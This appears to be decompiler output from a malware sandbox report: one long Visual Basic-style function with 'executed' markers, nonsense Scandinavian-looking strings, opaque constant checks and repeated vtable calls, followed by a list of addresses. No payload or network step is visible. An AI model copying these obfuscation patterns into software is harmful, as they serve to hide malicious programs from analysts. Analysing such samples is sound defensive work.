				signed int _t1264;
				signed int _t1268;
				signed int _t1279;
				signed int _t1284;
				signed int _t1289;
				signed int _t1293;
				void* _t1434;
				void* _t1436;
				intOrPtr _t1437;
				void* _t1438;
				void* _t1452;

				_t1437 = _t1436 - 0x18;
				 *[fs:0x0] = _t1437;
				L00401350();
				_v28 = _t1437;
				_v24 = 0x401198;
				_v20 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				_v16 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401356, _t1434);
				_v8 = 1;
				_v8 = 2;
				_push(L"Bovlamme1");
				_push(L"Unecliptic9");
				_push( &_v156); // executed
				L00401584(); // executed
				_v184 = L"stivstikkere";
				_v192 = 0x8008;
				_push( &_v156);
				_t894 =  &_v192;
				_push(_t894);
				L0040158A();
				_v236 = _t894;
				L0040157E();
				if(_v236 != 0) {
					_v8 = 3;
					if( *0x4223fc != 0) {
						_v308 = 0x4223fc;
					} else {
						_push(0x4223fc);
						_push(0x403c68);
						L00401578();
						_v308 = 0x4223fc;
					}
					_v236 =  *_v308;
					_t1279 =  *((intOrPtr*)( *_v236 + 0x14))(_v236,  &_v124);
					asm("fclex");
					_v240 = _t1279;
					if(_v240 >= 0) {
						_v312 = _v312 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c58);
						_push(_v236);
						_push(_v240);
						L00401572();
						_v312 = _t1279;
					}
					_v244 = _v124;
					_t1284 =  *((intOrPtr*)( *_v244 + 0x108))(_v244,  &_v196);
					asm("fclex");
					_v248 = _t1284;
					if(_v248 >= 0) {
						_v316 = _v316 & 0x00000000;
					} else {
						_push(0x108);
						_push(0x403c78);
						_push(_v244);
						_push(_v248);
						L00401572();
						_v316 = _t1284;
					}
					_v52 = _v196;
					L0040156C();
					_v8 = 4;
					if( *0x422010 != 0) {
						_v320 = 0x422010;
					} else {
						_push(0x422010);
						_push(0x403270);
						L00401578();
						_v320 = 0x422010;
					}
					_t1289 =  &_v124;
					L00401566();
					_v236 = _t1289;
					_t1293 =  *((intOrPtr*)( *_v236 + 0x158))(_v236,  &_v108, _t1289,  *((intOrPtr*)( *((intOrPtr*)( *_v320)) + 0x300))( *_v320));
					asm("fclex");
					_v240 = _t1293;
					if(_v240 >= 0) {
						_v324 = _v324 & 0x00000000;
					} else {
						_push(0x158);
						_push(0x403c88);
						_push(_v236);
						_push(_v240);
						L00401572();
						_v324 = _t1293;
					}
					_push(0x87);
					_push(_v108);
					L0040155A();
					L00401560();
					L00401554();
					L0040156C();
				}
				_v8 = 6;
				_v148 = 0x80020004;
				_v156 = 0xa;
				_push(0);
				_push(0xffffffff);
				_push( &_v156);
				_push(L"Tosdede8");
				_push( &_v172);
				L00401542();
				_t898 =  &_v172;
				_push(_t898);
				_push(0x2008);
				L00401548();
				_v224 = _t898;
				_push( &_v224);
				_push( &_v68);
				L0040154E();
				_push( &_v172);
				_t902 =  &_v156;
				_push(_t902);
				_push(2);
				L0040153C();
				_t1438 = _t1437 + 0xc;
				_v8 = 7;
				E00403A94(); // executed
				_v224 = _t902;
				L00401536();
				if(_v224 == 0x22d3bf) {
					_v8 = 8;
					_push(L"phrontisterium");
					L00401530();
					L00401560();
					_v8 = 9;
					if( *0x422010 != 0) {
						_v328 = 0x422010;
					} else {
						_push(0x422010);
						_push(0x403270);
						L00401578();
						_v328 = 0x422010;
					}
					_t1186 =  &_v124;
					L00401566();
					_v236 = _t1186;
					_t1190 =  *((intOrPtr*)( *_v236 + 0x48))(_v236,  &_v108, _t1186,  *((intOrPtr*)( *((intOrPtr*)( *_v328)) + 0x308))( *_v328));
					asm("fclex");
					_v240 = _t1190;
					if(_v240 >= 0) {
						_v332 = _v332 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x403cf4);
						_push(_v236);
						_push(_v240);
						L00401572();
						_v332 = _t1190;
					}
					_push(0);
					_push(0xffffffff);
					_push(1);
					_push(L"Calelectricity");
					_push(_v108);
					_push(L"STYRETABELLER");
					L0040152A();
					L00401560();
					L00401554();
					L0040156C();
					_v8 = 0xa;
					if( *0x422010 != 0) {
						_v336 = 0x422010;
					} else {
						_push(0x422010);
						_push(0x403270);
						L00401578();
						_v336 = 0x422010;
					}
					_t1194 =  &_v124;
					L00401566();
					_v236 = _t1194;
					_t1198 =  *((intOrPtr*)( *_v236 + 0xa0))(_v236,  &_v108, _t1194,  *((intOrPtr*)( *((intOrPtr*)( *_v336)) + 0x2fc))( *_v336));
					asm("fclex");
					_v240 = _t1198;
					if(_v240 >= 0) {
						_v340 = _v340 & 0x00000000;
					} else {
						_push(0xa0);
						_push(0x403c88);
						_push(_v236);
						_push(_v240);
						L00401572();
						_v340 = _t1198;
					}
					_push(_v108);
					_t1199 =  &_v116;
					_push(_t1199);
					L00401524();
					_push(_t1199);
					_push(L"Tvivlsomst9");
					_t1200 =  &_v112;
					_push(_t1200);
					L00401524();
					_push(_t1200);
					E00403AF0();
					_v224 = _t1200;
					L00401536();
					_v244 =  ~(0 | _v224 == 0x000f33d5);
					_push( &_v116);
					_push( &_v108);
					_push( &_v112);
					_push(3);
					L0040151E();
					_t1452 = _t1438 + 0x10;
					L0040156C();
					if(_v244 != 0) {
						_v8 = 0xb;
						if( *0x422010 != 0) {
							_v344 = 0x422010;
						} else {
							_push(0x422010);
							_push(0x403270);
							L00401578();
							_v344 = 0x422010;
						}
						_t1256 =  &_v124;
						L00401566();
						_v236 = _t1256;
						_t1260 =  *((intOrPtr*)( *_v236 + 0x50))(_v236,  &_v108, _t1256,  *((intOrPtr*)( *((intOrPtr*)( *_v344)) + 0x304))( *_v344));
						asm("fclex");
						_v240 = _t1260;
						if(_v240 >= 0) {
							_v348 = _v348 & 0x00000000;
						} else {
							_push(0x50);
							_push(0x403cf4);
							_push(_v236);
							_push(_v240);
							L00401572();
							_v348 = _t1260;
						}
						if( *0x422010 != 0) {
							_v352 = 0x422010;
						} else {
							_push(0x422010);
							_push(0x403270);
							L00401578();
							_v352 = 0x422010;
						}
						_t1264 =  &_v128;
						L00401566();
						_v244 = _t1264;
						_t1268 =  *((intOrPtr*)( *_v244 + 0x170))(_v244,  &_v112, _t1264,  *((intOrPtr*)( *((intOrPtr*)( *_v352)) + 0x30c))( *_v352));
						asm("fclex");
						_v248 = _t1268;
						if(_v248 >= 0) {
							_v356 = _v356 & 0x00000000;
						} else {
							_push(0x170);
							_push(0x403cf4);
							_push(_v244);
							_push(_v248);
							L00401572();
							_v356 = _t1268;
						}
						_push(_v108);
						_push(_v112);
						L00401518();
						L00401560();
						_push( &_v112);
						_push( &_v108);
						_push(2);
						L0040151E();
						_push( &_v128);
						_push( &_v124);
						_push(2);
						L00401512();
						_v8 = 0xc;
						_push( &_v96);
						_push(_a4);
						_push(0x403d48);
						L0040150C();
						_t1452 = _t1452 + 0x24;
					}
					_v8 = 0xe;
					if( *0x422010 != 0) {
						_v360 = 0x422010;
					} else {
						_push(0x422010);
						_push(0x403270);
						L00401578();
						_v360 = 0x422010;
					}
					_t1211 =  &_v124;
					L00401566();
					_v236 = _t1211;
					_t1215 =  *((intOrPtr*)( *_v236 + 0x110))(_v236,  &_v108, _t1211,  *((intOrPtr*)( *((intOrPtr*)( *_v360)) + 0x308))( *_v360));
					asm("fclex");
					_v240 = _t1215;
					if(_v240 >= 0) {
						_v364 = _v364 & 0x00000000;
					} else {
						_push(0x110);
						_push(0x403cf4);
						_push(_v236);
						_push(_v240);
						L00401572();
						_v364 = _t1215;
					}
					if( *0x422010 != 0) {
						_v368 = 0x422010;
					} else {
						_push(0x422010);
						_push(0x403270);
						L00401578();
						_v368 = 0x422010;
					}
					_t1219 =  &_v128;
					L00401566();
					_v244 = _t1219;
					_t1223 =  *((intOrPtr*)( *_v244 + 0x100))(_v244,  &_v132, _t1219,  *((intOrPtr*)( *((intOrPtr*)( *_v368)) + 0x304))( *_v368));
					asm("fclex");
					_v248 = _t1223;
					if(_v248 >= 0) {
						_v372 = _v372 & 0x00000000;
					} else {
						_push(0x100);
						_push(0x403cf4);
						_push(_v244);
						_push(_v248);
						L00401572();
						_v372 = _t1223;
					}
					_push(0);
					_push(0);
					_push(_v132);
					_t1224 =  &_v156;
					_push(_t1224);
					L00401500();
					_push(_t1224);
					L00401506();
					_push(_t1224);
					_push(_v108);
					_t1225 =  &_v112;
					_push(_t1225);
					L00401524();
					_push(_t1225);
					E00403B48();
					_v224 = _t1225;
					L00401536();
					_v252 =  ~(0 | _v224 == 0x001350c4);
					_push( &_v112);
					_push( &_v108);
					_push(2);
					L0040151E();
					_push( &_v132);
					_push( &_v128);
					_push( &_v124);
					_push(3);
					L00401512();
					_t1438 = _t1452 + 0x2c;
					L0040157E();
					if(_v252 != 0) {
						_v8 = 0xf;
						if( *0x422010 != 0) {
							_v376 = 0x422010;
						} else {
							_push(0x422010);
							_push(0x403270);
							L00401578();
							_v376 = 0x422010;
						}
						_t1238 =  &_v124;
						L00401566();
						_v236 = _t1238;
						_t1242 =  *((intOrPtr*)( *_v236 + 0x48))(_v236,  &_v108, _t1238,  *((intOrPtr*)( *((intOrPtr*)( *_v376)) + 0x30c))( *_v376));
						asm("fclex");
						_v240 = _t1242;
						if(_v240 >= 0) {
							_v380 = _v380 & 0x00000000;
						} else {
							_push(0x48);
							_push(0x403cf4);
							_push(_v236);
							_push(_v240);
							L00401572();
							_v380 = _t1242;
						}
						_v288 = _v108;
						_v108 = _v108 & 0x00000000;
						_v148 = _v288;
						_v156 = 8;
						_push(0);
						_push(0x80);
						_push( &_v156);
						_push( &_v172);
						L004014EE();
						_push( &_v172);
						_push( &_v176);
						L004014F4();
						_push( &_v176);
						_push( &_v64);
						L004014FA();
						L0040156C();
						_push( &_v172);
						_push( &_v156);
						_push(2);
						L0040153C();
						_t1438 = _t1438 + 0xc;
						_v8 = 0x10;
						_push(0xffffffff);
						L004014E8();
					}
				}
				_v8 = 0x13;
				E00403B8C(); // executed
				L00401536();
				_v8 = 0x14;
				if( *0x422010 != 0) {
					_v384 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v384 = 0x422010;
				}
				_t906 =  &_v124;
				L00401566();
				_v236 = _t906;
				_t910 =  *((intOrPtr*)( *_v236 + 0x1e8))(_v236,  &_v196, _t906,  *((intOrPtr*)( *((intOrPtr*)( *_v384)) + 0x2fc))( *_v384));
				asm("fclex");
				_v240 = _t910;
				if(_v240 >= 0) {
					_v388 = _v388 & 0x00000000;
				} else {
					_push(0x1e8);
					_push(0x403c88);
					_push(_v236);
					_push(_v240);
					L00401572();
					_v388 = _t910;
				}
				if( *0x422010 != 0) {
					_v392 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v392 = 0x422010;
				}
				_t914 =  &_v128;
				L00401566();
				_v244 = _t914;
				_t918 =  *((intOrPtr*)( *_v244 + 0x1f0))(_v244,  &_v200, _t914,  *((intOrPtr*)( *((intOrPtr*)( *_v392)) + 0x300))( *_v392));
				asm("fclex");
				_v248 = _t918;
				if(_v248 >= 0) {
					_v396 = _v396 & 0x00000000;
				} else {
					_push(0x1f0);
					_push(0x403c88);
					_push(_v244);
					_push(_v248);
					L00401572();
					_v396 = _t918;
				}
				if( *0x422010 != 0) {
					_v400 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v400 = 0x422010;
				}
				_t922 =  &_v132;
				L00401566();
				_v252 = _t922;
				_t926 =  *((intOrPtr*)( *_v252 + 0xe0))(_v252,  &_v204, _t922,  *((intOrPtr*)( *((intOrPtr*)( *_v400)) + 0x300))( *_v400));
				asm("fclex");
				_v256 = _t926;
				if(_v256 >= 0) {
					_v404 = _v404 & 0x00000000;
				} else {
					_push(0xe0);
					_push(0x403c88);
					_push(_v252);
					_push(_v256);
					L00401572();
					_v404 = _t926;
				}
				_v220 = _v204;
				_v216 = _v200;
				_v224 = 0x60ba6;
				_v212 = _v196;
				_v208 = 0x54e7;
				 *((intOrPtr*)( *_a4 + 0x710))(_a4,  &_v208,  &_v212,  &_v224,  &_v216,  &_v220);
				_push( &_v132);
				_push( &_v128);
				_push( &_v124);
				_push(3);
				L00401512();
				_v8 = 0x15;
				if( *0x422010 != 0) {
					_v408 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v408 = 0x422010;
				}
				_t944 =  &_v124;
				L00401566();
				_v236 = _t944;
				_t948 =  *((intOrPtr*)( *_v236 + 0x120))(_v236,  &_v224, _t944,  *((intOrPtr*)( *((intOrPtr*)( *_v408)) + 0x308))( *_v408));
				asm("fclex");
				_v240 = _t948;
				if(_v240 >= 0) {
					_v412 = _v412 & 0x00000000;
				} else {
					_push(0x120);
					_push(0x403cf4);
					_push(_v236);
					_push(_v240);
					L00401572();
					_v412 = _t948;
				}
				_v228 = 0x2d4eba;
				 *((intOrPtr*)( *_a4 + 0x714))(_a4, _v224,  &_v228);
				L0040156C();
				_v8 = 0x16;
				L004014E2();
				_v224 = 0x5e0e95;
				_t957 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4, 0x1088,  &_v224,  &_v108);
				_v236 = _t957;
				if(_v236 >= 0) {
					_v416 = _v416 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x40391c);
					_push(_a4);
					_push(_v236);
					L00401572();
					_v416 = _t957;
				}
				L00401554();
				_v8 = 0x17;
				if( *0x422010 != 0) {
					_v420 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v420 = 0x422010;
				}
				_t961 =  &_v124;
				L00401566();
				_v236 = _t961;
				_t965 =  *((intOrPtr*)( *_v236 + 0x60))(_v236,  &_v224, _t961,  *((intOrPtr*)( *((intOrPtr*)( *_v420)) + 0x300))( *_v420));
				asm("fclex");
				_v240 = _t965;
				if(_v240 >= 0) {
					_v424 = _v424 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x403c88);
					_push(_v236);
					_push(_v240);
					L00401572();
					_v424 = _t965;
				}
				if( *0x422010 != 0) {
					_v428 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v428 = 0x422010;
				}
				_t969 =  &_v128;
				L00401566();
				_v244 = _t969;
				_t973 =  *((intOrPtr*)( *_v244 + 0x110))(_v244,  &_v108, _t969,  *((intOrPtr*)( *((intOrPtr*)( *_v428)) + 0x308))( *_v428));
				asm("fclex");
				_v248 = _t973;
				if(_v248 >= 0) {
					_v432 = _v432 & 0x00000000;
				} else {
					_push(0x110);
					_push(0x403cf4);
					_push(_v244);
					_push(_v248);
					L00401572();
					_v432 = _t973;
				}
				if( *0x422010 != 0) {
					_v436 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v436 = 0x422010;
				}
				_t977 =  &_v132;
				L00401566();
				_v252 = _t977;
				_t981 =  *((intOrPtr*)( *_v252 + 0x120))(_v252,  &_v228, _t977,  *((intOrPtr*)( *((intOrPtr*)( *_v436)) + 0x308))( *_v436));
				asm("fclex");
				_v256 = _t981;
				if(_v256 >= 0) {
					_v440 = _v440 & 0x00000000;
				} else {
					_push(0x120);
					_push(0x403cf4);
					_push(_v252);
					_push(_v256);
					L00401572();
					_v440 = _t981;
				}
				_v232 = _v224;
				 *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v232, _v108, _v228,  &_v196);
				_v40 = _v196;
				L00401554();
				L00401512();
				_v8 = 0x18;
				_t995 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v224, 3,  &_v124,  &_v128,  &_v132);
				_v236 = _t995;
				if(_v236 >= 0) {
					_v444 = _v444 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x40391c);
					_push(_a4);
					_push(_v236);
					L00401572();
					_v444 = _t995;
				}
				_v100 = _v224;
				_v8 = 0x19;
				if( *0x422010 != 0) {
					_v448 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v448 = 0x422010;
				}
				_t1000 =  &_v124;
				L00401566();
				_v236 = _t1000;
				_t1004 =  *((intOrPtr*)( *_v236 + 0x48))(_v236,  &_v108, _t1000,  *((intOrPtr*)( *((intOrPtr*)( *_v448)) + 0x304))( *_v448));
				asm("fclex");
				_v240 = _t1004;
				if(_v240 >= 0) {
					_v452 = _v452 & 0x00000000;
				} else {
					_push(0x48);
					_push(0x403cf4);
					_push(_v236);
					_push(_v240);
					L00401572();
					_v452 = _t1004;
				}
				if( *0x422010 != 0) {
					_v456 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v456 = 0x422010;
				}
				_t1008 =  &_v128;
				L00401566();
				_v244 = _t1008;
				_t1012 =  *((intOrPtr*)( *_v244 + 0xf8))(_v244,  &_v196, _t1008,  *((intOrPtr*)( *((intOrPtr*)( *_v456)) + 0x2fc))( *_v456));
				asm("fclex");
				_v248 = _t1012;
				if(_v248 >= 0) {
					_v460 = _v460 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x403c88);
					_push(_v244);
					_push(_v248);
					L00401572();
					_v460 = _t1012;
				}
				_v200 = _v196;
				_v292 = _v108;
				_v108 = _v108 & 0x00000000;
				L00401560();
				_v224 = 0x20032;
				 *((intOrPtr*)( *_a4 + 0x71c))(_a4, 0x4dde,  &_v224,  &_v112,  &_v200, L"Koaguleringerne7",  &_v116);
				_v296 = _v116;
				_v116 = _v116 & 0x00000000;
				L00401560();
				L00401554();
				_push( &_v128);
				_push( &_v124);
				_push(2);
				L00401512();
				_v8 = 0x1a;
				if( *0x422010 != 0) {
					_v464 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v464 = 0x422010;
				}
				_t1028 =  &_v124;
				L00401566();
				_v236 = _t1028;
				_t1032 =  *((intOrPtr*)( *_v236 + 0x130))(_v236,  &_v128, _t1028,  *((intOrPtr*)( *((intOrPtr*)( *_v464)) + 0x30c))( *_v464));
				asm("fclex");
				_v240 = _t1032;
				if(_v240 >= 0) {
					_v468 = _v468 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x403cf4);
					_push(_v236);
					_push(_v240);
					L00401572();
					_v468 = _t1032;
				}
				_push(0);
				_push(0);
				_push(_v128);
				_push( &_v156); // executed
				L00401500(); // executed
				if( *0x422010 != 0) {
					_v472 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v472 = 0x422010;
				}
				_t1037 =  &_v132;
				L00401566();
				_v244 = _t1037;
				_t1041 =  *((intOrPtr*)( *_v244 + 0x1e0))(_v244,  &_v108, _t1037,  *((intOrPtr*)( *((intOrPtr*)( *_v472)) + 0x2fc))( *_v472));
				asm("fclex");
				_v248 = _t1041;
				if(_v248 >= 0) {
					_v476 = _v476 & 0x00000000;
				} else {
					_push(0x1e0);
					_push(0x403c88);
					_push(_v244);
					_push(_v248);
					L00401572();
					_v476 = _t1041;
				}
				if( *0x422010 != 0) {
					_v480 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v480 = 0x422010;
				}
				_t1045 =  &_v136;
				L00401566();
				_v252 = _t1045;
				_t1049 =  *((intOrPtr*)( *_v252 + 0x140))(_v252,  &_v196, _t1045,  *((intOrPtr*)( *((intOrPtr*)( *_v480)) + 0x30c))( *_v480));
				asm("fclex");
				_v256 = _t1049;
				if(_v256 >= 0) {
					_v484 = _v484 & 0x00000000;
				} else {
					_push(0x140);
					_push(0x403cf4);
					_push(_v252);
					_push(_v256);
					L00401572();
					_v484 = _t1049;
				}
				_v300 = _v108;
				_v108 = _v108 & 0x00000000;
				L00401560();
				L004014DC();
				L00401560();
				 *((intOrPtr*)( *_a4 + 0x720))(_a4,  &_v112, 0x41135d,  &_v116, _v196,  &_v120,  &_v156);
				_v304 = _v120;
				_v120 = _v120 & 0x00000000;
				L00401560();
				_push( &_v116);
				_push( &_v112);
				_push(2);
				L0040151E();
				_push( &_v128);
				_push( &_v136);
				_push( &_v132);
				_push( &_v124);
				_push(4);
				L00401512();
				L0040157E();
				_v8 = 0x1b;
				if( *0x422010 != 0) {
					_v488 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v488 = 0x422010;
				}
				_t1068 =  &_v124;
				L00401566();
				_v236 = _t1068;
				_t1072 =  *((intOrPtr*)( *_v236 + 0x120))(_v236,  &_v224, _t1068,  *((intOrPtr*)( *((intOrPtr*)( *_v488)) + 0x308))( *_v488));
				asm("fclex");
				_v240 = _t1072;
				if(_v240 >= 0) {
					_v492 = _v492 & 0x00000000;
				} else {
					_push(0x120);
					_push(0x403cf4);
					_push(_v236);
					_push(_v240);
					L00401572();
					_v492 = _t1072;
				}
				if( *0x422010 != 0) {
					_v496 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v496 = 0x422010;
				}
				_t1076 =  &_v128;
				L00401566();
				_v244 = _t1076;
				_t1080 =  *((intOrPtr*)( *_v244 + 0x140))(_v244,  &_v196, _t1076,  *((intOrPtr*)( *((intOrPtr*)( *_v496)) + 0x304))( *_v496));
				asm("fclex");
				_v248 = _t1080;
				if(_v248 >= 0) {
					_v500 = _v500 & 0x00000000;
				} else {
					_push(0x140);
					_push(0x403cf4);
					_push(_v244);
					_push(_v248);
					L00401572();
					_v500 = _t1080;
				}
				_v200 = _v196;
				_v228 = _v224;
				_t1088 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v228, L"Hvepsetaljer",  &_v200,  &_v232);
				_v252 = _t1088;
				if(_v252 >= 0) {
					_v504 = _v504 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x40391c);
					_push(_a4);
					_push(_v252);
					L00401572();
					_v504 = _t1088;
				}
				_v72 = _v232;
				_push( &_v128);
				_push( &_v124);
				_push(2);
				L00401512();
				_v8 = 0x1c;
				if( *0x422010 != 0) {
					_v508 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v508 = 0x422010;
				}
				_t1095 =  &_v124;
				L00401566();
				_v236 = _t1095;
				_t1099 =  *((intOrPtr*)( *_v236 + 0x180))(_v236,  &_v224, _t1095,  *((intOrPtr*)( *((intOrPtr*)( *_v508)) + 0x304))( *_v508));
				asm("fclex");
				_v240 = _t1099;
				if(_v240 >= 0) {
					_v512 = _v512 & 0x00000000;
				} else {
					_push(0x180);
					_push(0x403cf4);
					_push(_v236);
					_push(_v240);
					L00401572();
					_v512 = _t1099;
				}
				if( *0x422010 != 0) {
					_v516 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v516 = 0x422010;
				}
				_t1103 =  &_v128;
				L00401566();
				_v244 = _t1103;
				_t1107 =  *((intOrPtr*)( *_v244 + 0x160))(_v244,  &_v132, _t1103,  *((intOrPtr*)( *((intOrPtr*)( *_v516)) + 0x308))( *_v516));
				asm("fclex");
				_v248 = _t1107;
				if(_v248 >= 0) {
					_v520 = _v520 & 0x00000000;
				} else {
					_push(0x160);
					_push(0x403cf4);
					_push(_v244);
					_push(_v248);
					L00401572();
					_v520 = _t1107;
				}
				_push(0);
				_push(0);
				_push(_v132);
				_push( &_v156);
				L00401500();
				if( *0x422010 != 0) {
					_v524 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v524 = 0x422010;
				}
				_t1112 =  &_v136;
				L00401566();
				_v252 = _t1112;
				_t1116 =  *((intOrPtr*)( *_v252 + 0x108))(_v252,  &_v196, _t1112,  *((intOrPtr*)( *((intOrPtr*)( *_v524)) + 0x300))( *_v524));
				asm("fclex");
				_v256 = _t1116;
				if(_v256 >= 0) {
					_v528 = _v528 & 0x00000000;
				} else {
					_push(0x108);
					_push(0x403c88);
					_push(_v252);
					_push(_v256);
					L00401572();
					_v528 = _t1116;
				}
				if( *0x422010 != 0) {
					_v532 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v532 = 0x422010;
				}
				_t1120 =  &_v140;
				L00401566();
				_v260 = _t1120;
				_t1124 =  *((intOrPtr*)( *_v260 + 0xd8))(_v260,  &_v200, _t1120,  *((intOrPtr*)( *((intOrPtr*)( *_v532)) + 0x300))( *_v532));
				asm("fclex");
				_v264 = _t1124;
				if(_v264 >= 0) {
					_v536 = _v536 & 0x00000000;
				} else {
					_push(0xd8);
					_push(0x403c88);
					_push(_v260);
					_push(_v264);
					L00401572();
					_v536 = _t1124;
				}
				_v204 = _v196;
				_v228 = _v224;
				_t1128 =  &_v156;
				L00401506();
				 *((intOrPtr*)( *_a4 + 0x724))(_a4, 0x4863,  &_v228, _t1128, _t1128,  &_v204, _v200);
				_push( &_v132);
				_push( &_v140);
				_push( &_v136);
				_push( &_v128);
				_push( &_v124);
				_push(5);
				L00401512();
				L0040157E();
				_v8 = 0x1d;
				if( *0x422010 != 0) {
					_v540 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v540 = 0x422010;
				}
				_t1141 =  &_v124;
				L00401566();
				_v236 = _t1141;
				_t1145 =  *((intOrPtr*)( *_v236 + 0x130))(_v236,  &_v128, _t1141,  *((intOrPtr*)( *((intOrPtr*)( *_v540)) + 0x304))( *_v540));
				asm("fclex");
				_v240 = _t1145;
				if(_v240 >= 0) {
					_v544 = _v544 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x403cf4);
					_push(_v236);
					_push(_v240);
					L00401572();
					_v544 = _t1145;
				}
				L00401500();
				L004014E2();
				_v196 = 0x55da;
				_v224 = 0x3a4bff;
				_t1149 =  &_v156;
				L004014DC();
				L00401560();
				 *((intOrPtr*)( *_a4 + 0x728))(_a4,  &_v224, 0x361572,  &_v196, _t1149, _t1149, 0x6fee,  &_v112,  &_v200,  &_v156, _v128, 0, 0);
				_v76 = _v200;
				_push( &_v112);
				_push( &_v108);
				_push(2);
				L0040151E();
				_push( &_v128);
				_push( &_v124);
				_push(2);
				L00401512();
				L0040157E();
				_v8 = 0x1e;
				if( *0x422010 != 0) {
					_v548 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v548 = 0x422010;
				}
				_t1163 =  &_v124;
				L00401566();
				_v236 = _t1163;
				_t1167 =  *((intOrPtr*)( *_v236 + 0xf8))(_v236,  &_v196, _t1163,  *((intOrPtr*)( *((intOrPtr*)( *_v548)) + 0x304))( *_v548));
				asm("fclex");
				_v240 = _t1167;
				if(_v240 >= 0) {
					_v552 = _v552 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x403cf4);
					_push(_v236);
					_push(_v240);
					L00401572();
					_v552 = _t1167;
				}
				_v200 = _v196;
				L004014E2();
				L004014E2();
				_t1174 =  *((intOrPtr*)( *_a4 + 0x704))(_a4, 0x2e8fdf, 0x45e2,  &_v108, 0x37d3ea,  &_v112,  &_v200);
				_v244 = _t1174;
				if(_v244 >= 0) {
					_v556 = _v556 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x40391c);
					_push(_a4);
					_push(_v244);
					L00401572();
					_v556 = _t1174;
				}
				L0040151E();
				L0040156C();
				_v8 = 0x1f;
				_t1180 =  *((intOrPtr*)( *_a4 + 0x708))(_a4,  &_v156, 2,  &_v108,  &_v112);
				_v236 = _t1180;
				if(_v236 >= 0) {
					_v560 = _v560 & 0x00000000;
				} else {
					_push(0x708);
					_push(0x40391c);
					_push(_a4);
					_push(_v236);
					L00401572();
					_v560 = _t1180;
				}
				L0040157E();
				_v20 = 0;
				_push(0x41f05d);
				L00401554();
				L00401554();
				L00401554();
				L00401554();
				_push( &_v64);
				_push(0);
				L004014D6();
				_t1182 =  &_v68;
				_push(_t1182);
				_push(0);
				L004014D6();
				L00401554();
				L0040157E();
				L00401554();
				return _t1182;
			}

0x0041d1a7
0x0041d1b6
0x0041d1c2
0x0041d1ca
0x0041d1cd
0x0041d1da
0x0041d1e3
0x0041d1e6
0x0041d1f5
0x0041d1f8
0x0041d1ff
0x0041d206
0x0041d20b
0x0041d216
0x0041d217
0x0041d21c
0x0041d226
0x0041d236
0x0041d237
0x0041d23d
0x0041d23e
0x0041d243
0x0041d250
0x0041d25e
0x0041d264
0x0041d272
0x0041d28f
0x0041d274
0x0041d274
0x0041d279
0x0041d27e
0x0041d283
0x0041d283
0x0041d2a1
0x0041d2b9
0x0041d2bc
0x0041d2be
0x0041d2cb
0x0041d2ed
0x0041d2cd
0x0041d2cd
0x0041d2cf
0x0041d2d4
0x0041d2da
0x0041d2e0
0x0041d2e5
0x0041d2e5
0x0041d2f7
0x0041d312
0x0041d318
0x0041d31a
0x0041d327
0x0041d34c
0x0041d329
0x0041d329
0x0041d32e
0x0041d333
0x0041d339
0x0041d33f
0x0041d344
0x0041d344
0x0041d35a
0x0041d361
0x0041d366
0x0041d374
0x0041d391
0x0041d376
0x0041d376
0x0041d37b
0x0041d380
0x0041d385
0x0041d385
0x0041d3b5
0x0041d3b9
0x0041d3be
0x0041d3d6
0x0041d3dc
0x0041d3de
0x0041d3eb
0x0041d410
0x0041d3ed
0x0041d3ed
0x0041d3f2
0x0041d3f7
0x0041d3fd
0x0041d403
0x0041d408
0x0041d408
0x0041d417
0x0041d41c
0x0041d41f
0x0041d429
0x0041d431
0x0041d439
0x0041d439
0x0041d43e
0x0041d445
0x0041d44f
0x0041d459
0x0041d45b
0x0041d463
0x0041d464
0x0041d46f
0x0041d470
0x0041d475
0x0041d47b
0x0041d47c
0x0041d481
0x0041d486
0x0041d492
0x0041d496
0x0041d497
0x0041d4a2
0x0041d4a3
0x0041d4a9
0x0041d4aa
0x0041d4ac
0x0041d4b1
0x0041d4b4
0x0041d4bb
0x0041d4c0
0x0041d4c6
0x0041d4d5
0x0041d4db
0x0041d4e2
0x0041d4e7
0x0041d4f1
0x0041d4f6
0x0041d504
